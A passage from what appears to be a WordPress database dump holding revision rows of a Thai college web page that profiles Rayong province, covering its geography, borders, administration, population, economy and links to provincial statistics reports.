class=\"wp-image-827 size-full aligncenter\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-09-24.jpg\" alt=\"\" width=\"645\" height=\"271\" />\r\n<h3><span style=\"color: #0000ff;\"><b><span lang=\"TH\">ขนาดและที่ตั้ง</span></b></span></h3>\r\n<div>\r\n<div>\r\n\r\n<span lang=\"TH\">จังหวัดระยองมีพื้นที่ประมาณ </span>3,552 <span lang=\"TH\">ตารางกิโลเมตร หรือ </span>2,220,000 <span lang=\"TH\">ไร่</span><span lang=\"TH\"> ตั้งอยู่ในภาคตะวันออกของประเทศไทยระหว่างเส้นรุ้งที่ </span>12-13 <span lang=\"TH\">องศาเหนือ และเส้นแวงที่ </span>101-102 <span lang=\"TH\">องศาตะวันออก ห่างจากกรุงเทพฯ ประมาณ </span>179 <span lang=\"TH\">กิโลเมตร</span><span lang=\"TH\"> มีอาณาเขตติดต่อกับจังหวัดใกล้เคียงดังนี้</span>\r\n\r\n</div>\r\n</div>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศเหนือ </span></b><span lang=\"TH\"> ติดต่อกับเขตอำเภอหนองใหญ่ อำเภอบ่อทอง และอำเภอศรีราชา</span>ของจังหวัดชลบุรี\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศใต</span></b><span lang=\"TH\">้ จดทะเลอ่าวไทย พื้นที่ฝั่งทะเลยาวประมาณ </span>100 <span lang=\"TH\">กิโลเมตร</span><span lang=\"TH\"> ของอ่าวไทย</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศตะวันออก</span></b> <span lang=\"TH\"> ติดต่อกับเขตอำเภอท่าใหม่ อำเภอนายายอาม ของจังหวัดจันทบุรี</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศตะวันตก</span></b> <span lang=\"TH\"> ติดต่อกับเขตอำเภอสัตหีบ อำเภอบางละมุง ของจังหวัดชลบุรี</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<strong><span style=\"color: #0000ff;\"> <a href=\"http://www.oceansmile.com/map/k/3178.gif\"><img class=\"aligncenter wp-image-830 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-44-46.jpg\" alt=\"\" width=\"1076\" height=\"707\" /></a> </span></strong>\r\n<h3><span style=\"color: #0000ff;\"><b><span lang=\"TH\">การปกครองและประชากร</span></b></span></h3>\r\n<span lang=\"TH\">แบ่งเขตการปกครองเป็น</span> 8 <span lang=\"TH\">อำเภอ โดยประกอบด้วย</span> 54 <span lang=\"TH\">ตำบล</span> 439 <span lang=\"TH\">หมู่บ้าน</span> 80 <span lang=\"TH\">ชุมชน ส่วนด้านการปกครองท้องถิ่น ประกอบด้วย องค์การบริหารส่วนจังหวัด</span> 1 <span lang=\"TH\">แห่ง เทศบาลนคร</span> 1 <span lang=\"TH\">แห่ง เทศบาลเมือง</span> 2 <span lang=\"TH\">แห่ง เทศบาลตำบล 24 แห่ง และองค์การบริหารส่วนตำบล</span> 4<span lang=\"TH\">0 แห่ง ประชากรของจังหวัดระยอง ณ ธันวาคม </span>255<span lang=\"TH\">3</span> <span lang=\"TH\">มีทั้งสิ้น</span> 6<span lang=\"TH\">26</span>,4<span lang=\"TH\">03 คน เป็นชาย 309</span>,<span lang=\"TH\">014 คน คิดเป็นร้อยละ</span>49.33 <span lang=\"TH\">เป็นหญิง 317,388 คน คิดเป็นร้อยละ</span> 50.67 <span lang=\"TH\">ของประชากรทั้งหมด อำเภอที่มีประชากรมากที่สุด คือ อำเภอเมือง มีจำนวน</span> 2<span lang=\"TH\">45</span>,<span lang=\"TH\">921</span> <span lang=\"TH\">คน อำเภอที่มีประชากรน้อยที่สุด คือ อำเภอเขาชะเมา มีจำนวน</span> 23,<span lang=\"TH\">324 คน จำนวนครัวเรือนทั้งจังหวัดรวม</span> 3<span lang=\"TH\">23</span>,<span lang=\"TH\">056 ครัวเรือน อำเภอเมืองระยองมีความหนาแน่นของประชากรมากที่สุด คือ</span> 486.03 <span lang=\"TH\">คนต่อหนึ่งตารางกิโลเมตร รองลงมาคือ อำเภอบ้านฉาง</span>261.91 <span lang=\"TH\">คนต่อหนึ่งตารางกิโลเมตร อำเภอที่มีประชากรหนาแน่นน้อยที่สุด คืออำเภอวังจันทร์ 64.67 คนต่อหนึ่งตารางกิโลเมตร จากการคาดการณ์ว่าประชากรของจังหวัดระยองจะเพิ่มเป็น</span> 638,017 <span lang=\"TH\">คนในปี</span> 2560 <span lang=\"TH\">แต่ในสภาพความเป็นจริง จังหวัดระยองมีประชากรมากกว่าตัวเลขในทะเบียนราษฎร์ไม่ต่ำกว่า</span> 300,000 <span lang=\"TH\">คน ทั้งนี้เกิดจากการอพยพเข้ามาในแรงงานภาคอุตสาหกรรมและการบริการ และมีแนวโน้มที่จะเพิ่มขึ้นอย่างรวดเร็วตามการเติบโตของภาคอุตสาหกรรม</span>\r\n<h3></h3>\r\n<h4><span style=\"color: #0000ff;\">ข้อมูลด้านประวัติศาสตร์ ภูมิศาสตร์ เศรษฐกิจ สังคม การศึกษา และสาระที่เป็นประโยชน์ด้านอื่น ๆ </span><span style=\"color: #0000ff;\">เกี่ยวกับจังหวัดระยองเพิ่มเติม >>>> ตามเวปไซต์ และ LINK ด้านล่าง</span></h4>\r\n<h3><span style=\"color: #0000ff;\"><a href=\"http://www.rayong.go.th/\"><img class=\"alignleft wp-image-831 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-58-38.jpg\" alt=\"\" width=\"698\" height=\"146\" /></a> </span></h3>\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.industry.go.th/industry/index.php/th/\"><img class=\"alignleft wp-image-832 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-58-49.jpg\" alt=\"\" width=\"701\" height=\"116\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.industry.go.th/rayong/\"><img class=\"alignleft wp-image-833 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-16.jpg\" alt=\"\" width=\"729\" height=\"123\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.fti-rayong.com/\"><img class=\"alignleft wp-image-834 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-28.jpg\" alt=\"\" width=\"424\" height=\"104\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.aecthaibiz.com/province/main.html?pv=21\"><img class=\"alignleft wp-image-835 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-38.jpg\" alt=\"\" width=\"422\" height=\"89\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n<h4><b><a href=\"http://rayong.cdd.go.th/project.html/JPT/JPT.htm\">ข้อมูลความจำเป็นพื้นฐานและข้อมูลพื้นฐาน</a> จังหวัดระยอง 2559</b></h4>\r\n<h2 class=\"contentheading\"><a href=\"http://wwww.technicrayong.ac.th/sites/default/files/file/Datacenter/5%20%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B9%80%E0%B8%A8%E0%B8%A3%E0%B8%A9%E0%B8%90%E0%B8%81%E0%B8%B4%E0%B8%88/%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%9E%E0%B8%B1%E0%B8%92%E0%B8%99%E0%B8%B2%E0%B8%88%E0%B8%B1%E0%B8%87%E0%B8%AB%E0%B8%A7%E0%B8%B1%E0%B8%94%E0%B8%A3%E0%B8%B0%E0%B8%A2%E0%B8%AD%E0%B8%87%202558-2561.pdf\">แผนพัฒนาจังหวัดระยอง 2558 - 2561</a></h2>\r\n<div class=\"article-rel-wrapper\">\r\n<h4 class=\"contentheading\"><a href=\"/sites/default/files/file/Datacenter/5%20%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B9%80%E0%B8%A8%E0%B8%A3%E0%B8%A9%E0%B8%90%E0%B8%81%E0%B8%B4%E0%B8%88/vision%20in%20rayong%202554(news).pdf\">บรรยายสรุปจังหวัดระยอง</a></h4>\r\n</div>\r\n<h3><a href=\"http://klang.cgd.go.th/ryg/gpprayong.html\">GPP จังหวัดระยอง</a></h3>\r\n<a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=608&Itemid=199\"><strong>รายงานภาวะเศรษฐกิจการคลังจังหวัดระยอง ปีงบประมาณ 2548-2558</strong></a>\r\n\r\n<strong>รายงานภาวะเศรษฐกิจการคลังจังหวัดระยอง </strong><strong>ปีงบประมาณ 2555 </strong><strong> <a href=\"http://wwww.technicrayong.ac.th/sites/default/files/file/Datacenter/5%20%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B9%80%E0%B8%A8%E0%B8%A3%E0%B8%A9%E0%B8%90%E0%B8%81%E0%B8%B4%E0%B8%88/%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%A0%E0%B8%B2%E0%B8%A7%E0%B8%B0%E0%B9%80%E0%B8%A8%E0%B8%A3%E0%B8%A9%E0%B8%90%E0%B8%81%E0%B8%B4%E0%B8%88%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%84%E0%B8%A5%E0%B8%B1%E0%B8%87%E0%B8%88_%E0%B8%A3%E0%B8%B0%E0%B8%A2%E0%B8%AD%E0%B8%87%20%E0%B9%80%E0%B8%94%E0%B8%B7%E0%B8%AD%E0%B8%99%E0%B8%95%E0%B8%B8%E0%B8%A5%E0%B8%B2%E0%B8%84%E0%B8%A1%202555.pdf\">เดือนตุลาคม</a></strong>\r\n\r\n<strong>รายงานภาวะเศรษฐกิจการคลังจังหวัดระยอง <a href=\"http://wwww.technicrayong.ac.th/sites/default/files/file/Datacenter/5%20%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B9%80%E0%B8%A8%E0%B8%A3%E0%B8%A9%E0%B8%90%E0%B8%81%E0%B8%B4%E0%B8%88/%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%A0%E0%B8%B2%E0%B8%A7%E0%B8%B0%E0%B9%80%E0%B8%A8%E0%B8%A3%E0%B8%A9%E0%B8%90%E0%B8%81%E0%B8%B4%E0%B8%88%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%84%E0%B8%A5%E0%B8%B1%E0%B8%87%E0%B8%88%E0%B8%B1%E0%B8%87%E0%B8%AB%E0%B8%A7%E0%B8%B1%E0%B8%94%E0%B8%A3%E0%B8%B0%E0%B8%A2%E0%B8%AD%E0%B8%87%20%E0%B8%9B%E0%B8%B5%202554.pdf\">ปีงบประมาณ 2554 </a> </strong>\r\n<h4><b><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1180:-2557&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2559</a></b></h4>\r\n<h4><span style=\"color: #0000ff; font-size: medium;\"><b><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1159:-2558&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2558</a></b></span></h4>\r\n<h4><b><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1134:-2557&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2557</a></b></h4>\r\n<h4><strong><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1133:-2556&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2556</a></strong></h4>\r\n<h4><strong><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1103:-2555&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2555</a></strong></h4>\r\n<h4><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1047:-2554&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2554</strong></a></h4>\r\n<div class=\"article-rel-wrapper\">\r\n<h4 class=\"contentheading\"><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1016:-2553&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2553</strong></a></h4>\r\n<h4 class=\"contentheading\"><a href=\"http://123.242.173.4/v2/index.php?option=com_content&view=article&id=910:2010-04-04-09-46-49&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2552</strong></a></h4>\r\n<div class=\"article-rel-wrapper\">\r\n<h4 class=\"contentheading\"><a href=\"http://123.242.173.4/v2/index.php?option=com_content&view=article&id=764:2010-04-04-09-46-49&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2551</strong></a></h4>\r\n</div>\r\n</div>', 'ข้อมูลพื้นฐานจังหวัด', '', 'inherit', 'closed', 'closed', '', '821-revision-v1', '', '', '2018-01-29 16:37:13', '2018-01-29 09:37:13', '', 821, 'http://www.technicrayong.ac.th/821-revision-v1/', 0, 'revision', '', 0),
(843, 3, '2018-01-29 20:32:46', '2018-01-29 13:32:46', '<img class=\"aligncenter wp-image-822 size-full\" src=\"/wp-content/uploads/2018/01/GPP55-e1517214593488.jpg\" alt=\"\" width=\"1106\" height=\"700\" />\r\n<h3 id=\"sites-page-title-header\" align=\"left\"><span id=\"sites-page-title\" dir=\"ltr\" style=\"color: #0000ff;\" tabindex=\"-1\">ข้อมูลทั่วไปจังหวัดระยอง</span></h3>\r\n<div> ระยอง....เป็นจังหวัดขนาดเล็กแห่งหนึ่งในภาคตะวันออกของประเทศ เป็นที่รู้จักในปัจจุบันว่าเป็นแหล่งท่องเที่ยว มีผลไม้ชั้นยอด เป็นแหล่งอุตสาหกรรมหลักของประเทศ มีสภาพเศรษฐกิจดี มีรายได้<span lang=\"TH\">ต่อหัวประชากรสูงเป็นอันดับหนึ่งของประเทศ คือ 1</span>,<span lang=\"TH\">143</span>,<span lang=\"TH\">740 บาท/ คน ผลิตภัณฑ์มวลรวมจังหวัด (</span>GPP<span lang=\"TH\">) เท่ากับ</span> <span lang=\"TH\">672</span>,<span lang=\"TH\">104 ล้านบาท ซึ่งมาจากสาขาการผลิตด้านอุตสาหกรรมและเหมืองแร่ กว่าร้อยละ 92</span></div>\r\n<div> แต่เดิมจังหวัดระยองเป็นที่รู้จักในฐานะเมืองผลไม้ดีของภาคตะวันออ ไม่ว่าจะเป็นมังคุด ทุเรียน เงาะ รวมทั้งอาหารทะเลสด แปรรูป กะปิ น้ำปลา เนื่องจากสภาพดินฟ้าอากาศที่เอื้ออำนวย และสภาพภูมิประเทศที่เหมาะสม นอกจากนี้ยังได้ชื่อว่าเป็นเมืองท่องเที่ยวที่สวยงาม มีชายหาดยาวสวยเลียบขนานไปกับอ่าวไทย และเกาะสวยงามระดับโลก เช่น เกาะเสม็ดที่รู้จักกันแพร่หลายท่ามกลางนักท่องเที่ยวชาวไทย และ<span lang=\"TH\">ชาวต่างประเทศฐานเศรษฐกิจที่สำคัญของจังหวัด คือ ภาคเกษตรกรรม การท่องเที่ยวและภาคอุตสาหกรรม (ข้อมูลสรุปจังหวัดระยอง ปี </span>2553<span lang=\"TH\">)</span></div>\r\n<div> จังหวัดระยองเริ่มมีการเปลี่ยนแปลงเป็นจังหวัดอุตสาหกรรม นับตั้งแต่ค้นพบก๊าซธรรมชาติ <span lang=\"TH\">ในอ่าวไทยเมื่อปี พ</span>.<span lang=\"TH\">ศ</span>. 2520 <span lang=\"TH\">เป็นการเริ่มต้นยุค </span>“<span lang=\"TH\">โชติช่วงชัชวาล</span>”<span lang=\"TH\"> และเป็นที่มาของ </span>“<span lang=\"TH\">โครงการพัฒนาพื้นที่ชายฝั่งทะเลภาคตะวันออก</span>”<span lang=\"TH\"> ( </span>Eastern Seaboard Development Program<span lang=\"TH\"> ) ในปี 2524 ช่วงระยะเวลาเกือบ 30 ปี ทำให้โครงสร้างทางเศรษฐกิจของจังหวัดระยองเปลี่ยนเป็นอุตสาหกรรมนำการท่องเที่ยวและเกษตรกรรม <span style=\"color: #0000ff;\">>>>></span></span><a href=\"https://sites.google.com/site/rayongshelter/khxmul-thawpi-canghwad-rayxng\"><span style=\"color: #0000ff;\">ข้อมูลเพิ่มเติม</span></a></div>\r\n<div></div>\r\n<div></div>\r\n<img class=\"aligncenter wp-image-826 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-06-39.jpg\" alt=\"\" width=\"696\" height=\"632\" />\r\n\r\n<img class=\"wp-image-827 size-full aligncenter\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-09-24.jpg\" alt=\"\" width=\"645\" height=\"271\" />\r\n<h3><span style=\"color: #0000ff;\"><b><span lang=\"TH\">ขนาดและที่ตั้ง</span></b></span></h3>\r\n<div>\r\n<div>\r\n\r\n<span lang=\"TH\">จังหวัดระยองมีพื้นที่ประมาณ </span>3,552 <span lang=\"TH\">ตารางกิโลเมตร หรือ </span>2,220,000 <span lang=\"TH\">ไร่</span><span lang=\"TH\"> ตั้งอยู่ในภาคตะวันออกของประเทศไทยระหว่างเส้นรุ้งที่ </span>12-13 <span lang=\"TH\">องศาเหนือ และเส้นแวงที่ </span>101-102 <span lang=\"TH\">องศาตะวันออก ห่างจากกรุงเทพฯ ประมาณ </span>179 <span lang=\"TH\">กิโลเมตร</span><span lang=\"TH\"> มีอาณาเขตติดต่อกับจังหวัดใกล้เคียงดังนี้</span>\r\n\r\n</div>\r\n</div>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศเหนือ </span></b><span lang=\"TH\"> ติดต่อกับเขตอำเภอหนองใหญ่ อำเภอบ่อทอง และอำเภอศรีราชา</span>ของจังหวัดชลบุรี\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศใต</span></b><span lang=\"TH\">้ จดทะเลอ่าวไทย พื้นที่ฝั่งทะเลยาวประมาณ </span>100 <span lang=\"TH\">กิโลเมตร</span><span lang=\"TH\"> ของอ่าวไทย</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศตะวันออก</span></b> <span lang=\"TH\"> ติดต่อกับเขตอำเภอท่าใหม่ อำเภอนายายอาม ของจังหวัดจันทบุรี</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศตะวันตก</span></b> <span lang=\"TH\"> ติดต่อกับเขตอำเภอสัตหีบ อำเภอบางละมุง ของจังหวัดชลบุรี</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<strong><span style=\"color: #0000ff;\"> <a href=\"http://www.oceansmile.com/map/k/3178.gif\"><img class=\"aligncenter wp-image-830 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-44-46.jpg\" alt=\"\" width=\"1076\" height=\"707\" /></a> </span></strong>\r\n<h3><span style=\"color: #0000ff;\"><b><span lang=\"TH\">การปกครองและประชากร</span></b></span></h3>\r\n<span lang=\"TH\">แบ่งเขตการปกครองเป็น</span> 8 <span lang=\"TH\">อำเภอ โดยประกอบด้วย</span> 54 <span lang=\"TH\">ตำบล</span> 439 <span lang=\"TH\">หมู่บ้าน</span> 80 <span lang=\"TH\">ชุมชน ส่วนด้านการปกครองท้องถิ่น ประกอบด้วย องค์การบริหารส่วนจังหวัด</span> 1 <span lang=\"TH\">แห่ง เทศบาลนคร</span> 1 <span lang=\"TH\">แห่ง เทศบาลเมือง</span> 2 <span lang=\"TH\">แห่ง เทศบาลตำบล 24 แห่ง และองค์การบริหารส่วนตำบล</span> 4<span lang=\"TH\">0 แห่ง ประชากรของจังหวัดระยอง ณ ธันวาคม </span>255<span lang=\"TH\">3</span> <span lang=\"TH\">มีทั้งสิ้น</span> 6<span lang=\"TH\">26</span>,4<span lang=\"TH\">03 คน เป็นชาย 309</span>,<span lang=\"TH\">014 คน คิดเป็นร้อยละ</span>49.33 <span lang=\"TH\">เป็นหญิง 317,388 คน คิดเป็นร้อยละ</span> 50.67 <span lang=\"TH\">ของประชากรทั้งหมด อำเภอที่มีประชากรมากที่สุด คือ อำเภอเมือง มีจำนวน</span> 2<span lang=\"TH\">45</span>,<span lang=\"TH\">921</span> <span lang=\"TH\">คน อำเภอที่มีประชากรน้อยที่สุด คือ อำเภอเขาชะเมา มีจำนวน</span> 23,<span lang=\"TH\">324 คน จำนวนครัวเรือนทั้งจังหวัดรวม</span> 3<span lang=\"TH\">23</span>,<span lang=\"TH\">056 ครัวเรือน อำเภอเมืองระยองมีความหนาแน่นของประชากรมากที่สุด คือ</span> 486.03 <span lang=\"TH\">คนต่อหนึ่งตารางกิโลเมตร รองลงมาคือ อำเภอบ้านฉาง</span>261.91 <span lang=\"TH\">คนต่อหนึ่งตารางกิโลเมตร อำเภอที่มีประชากรหนาแน่นน้อยที่สุด คืออำเภอวังจันทร์ 64.67 คนต่อหนึ่งตารางกิโลเมตร จากการคาดการณ์ว่าประชากรของจังหวัดระยองจะเพิ่มเป็น</span> 638,017 <span lang=\"TH\">คนในปี</span> 2560 <span lang=\"TH\">แต่ในสภาพความเป็นจริง จังหวัดระยองมีประชากรมากกว่าตัวเลขในทะเบียนราษฎร์ไม่ต่ำกว่า</span> 300,000 <span lang=\"TH\">คน ทั้งนี้เกิดจากการอพยพเข้ามาในแรงงานภาคอุตสาหกรรมและการบริการ และมีแนวโน้มที่จะเพิ่มขึ้นอย่างรวดเร็วตามการเติบโตของภาคอุตสาหกรรม</span>\r\n<h3></h3>\r\n<h4><span style=\"color: #0000ff;\">ข้อมูลด้านประวัติศาสตร์ ภูมิศาสตร์ เศรษฐกิจ สังคม การศึกษา และสาระที่เป็นประโยชน์ด้านอื่น ๆ </span><span style=\"color: #0000ff;\">เกี่ยวกับจังหวัดระยองเพิ่มเติม >>>> ตามเวปไซต์ และ LINK ด้านล่าง</span></h4>\r\n<h3><span style=\"color: #0000ff;\"><a href=\"http://www.rayong.go.th/\"><img class=\"alignleft wp-image-831 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-58-38.jpg\" alt=\"\" width=\"698\" height=\"146\" /></a> </span></h3>\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.industry.go.th/industry/index.php/th/\"><img class=\"alignleft wp-image-832 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-58-49.jpg\" alt=\"\" width=\"701\" height=\"116\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.industry.go.th/rayong/\"><img class=\"alignleft wp-image-833 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-16.jpg\" alt=\"\" width=\"729\" height=\"123\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.fti-rayong.com/\"><img class=\"alignleft wp-image-834 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-28.jpg\" alt=\"\" width=\"424\" height=\"104\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.aecthaibiz.com/province/main.html?pv=21\"><img class=\"alignleft wp-image-835 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-38.jpg\" alt=\"\" width=\"422\" height=\"89\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n<h4><b><a href=\"http://rayong.cdd.go.th/project.html/JPT/JPT.htm\">ข้อมูลความจำเป็นพื้นฐานและข้อมูลพื้นฐาน</a> จังหวัดระยอง 2559</b></h4>\r\n<h2 class=\"contentheading\"><a href=\"http://wwww.technicrayong.ac.th/sites/default/files/file/Datacenter/5%20%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B9%80%E0%B8%A8%E0%B8%A3%E0%B8%A9%E0%B8%90%E0%B8%81%E0%B8%B4%E0%B8%88/%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%9E%E0%B8%B1%E0%B8%92%E0%B8%99%E0%B8%B2%E0%B8%88%E0%B8%B1%E0%B8%87%E0%B8%AB%E0%B8%A7%E0%B8%B1%E0%B8%94%E0%B8%A3%E0%B8%B0%E0%B8%A2%E0%B8%AD%E0%B8%87%202558-2561.pdf\">แผนพัฒนาจังหวัดระยอง 2558 - 2561</a></h2>\r\n<div class=\"article-rel-wrapper\">\r\n<h4 class=\"contentheading\"><a href=\"/sites/default/files/file/Datacenter/5%20%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B9%80%E0%B8%A8%E0%B8%A3%E0%B8%A9%E0%B8%90%E0%B8%81%E0%B8%B4%E0%B8%88/vision%20in%20rayong%202554(news).pdf\">บรรยายสรุปจังหวัดระยอง</a></h4>\r\n</div>\r\n<h3><a href=\"http://klang.cgd.go.th/ryg/gpprayong.html\">GPP จังหวัดระยอง</a></h3>\r\n<a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=608&Itemid=199\"><strong>รายงานภาวะเศรษฐกิจการคลังจังหวัดระยอง ปีงบประมาณ 2548-2558</strong></a>\r\n\r\n<strong>รายงานภาวะเศรษฐกิจการคลังจังหวัดระยอง </strong><strong>ปีงบประมาณ 2555 </strong><strong> <a href=\"http://wwww.technicrayong.ac.th/sites/default/files/file/Datacenter/5%20%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B9%80%E0%B8%A8%E0%B8%A3%E0%B8%A9%E0%B8%90%E0%B8%81%E0%B8%B4%E0%B8%88/%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%A0%E0%B8%B2%E0%B8%A7%E0%B8%B0%E0%B9%80%E0%B8%A8%E0%B8%A3%E0%B8%A9%E0%B8%90%E0%B8%81%E0%B8%B4%E0%B8%88%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%84%E0%B8%A5%E0%B8%B1%E0%B8%87%E0%B8%88_%E0%B8%A3%E0%B8%B0%E0%B8%A2%E0%B8%AD%E0%B8%87%20%E0%B9%80%E0%B8%94%E0%B8%B7%E0%B8%AD%E0%B8%99%E0%B8%95%E0%B8%B8%E0%B8%A5%E0%B8%B2%E0%B8%84%E0%B8%A1%202555.pdf\">เดือนตุลาคม</a></strong>\r\n\r\n<strong>รายงานภาวะเศรษฐกิจการคลังจังหวัดระยอง <a 